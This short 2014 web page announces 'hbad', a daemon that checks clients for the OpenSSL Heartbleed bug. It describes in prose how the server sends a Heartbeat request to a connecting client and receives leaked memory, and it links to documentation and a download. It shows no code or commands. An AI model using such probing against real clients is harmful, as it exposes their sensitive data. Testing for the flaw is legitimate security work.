Heartbleed analysis daemon published

Heartbleed analysis daemon published

Date: 2014-05-02 14:17:53

Preface

The Heartbleed bug is a programming error in the versions 1.0.1 to 1.0.1f of the open-source OpenSSL cryptography library. This critical security gap makes it possible to read encrypted data of clients and servers connected via TLS. It was fixed in version 1.0.1g on april 7th, 2014.

Hbad functionality

The functionality of hbad can be demonstrated with the below illustration:




If a request is sent to the hbad server by any client (e.g. IRC, Fetchmail, browser), the server initiates the SSL handshake and checks the SSL header for the Heartbeat addon. If it is available, it indicates the client uses OpenSSL. Thereupon the hbad server sends a Heartbeat request back to the client. If the client runs a vulnerable OpenSSL version, it sends back the Heartbeat response, which contains the sensitive data.

Download documentation and client tests:

text-file-icon hbad_en.pdf (English)

text-file-icon hbad_dt.pdf (Deutsch)

You can download hbad here:

text-file-icon hbad-release.tar.gz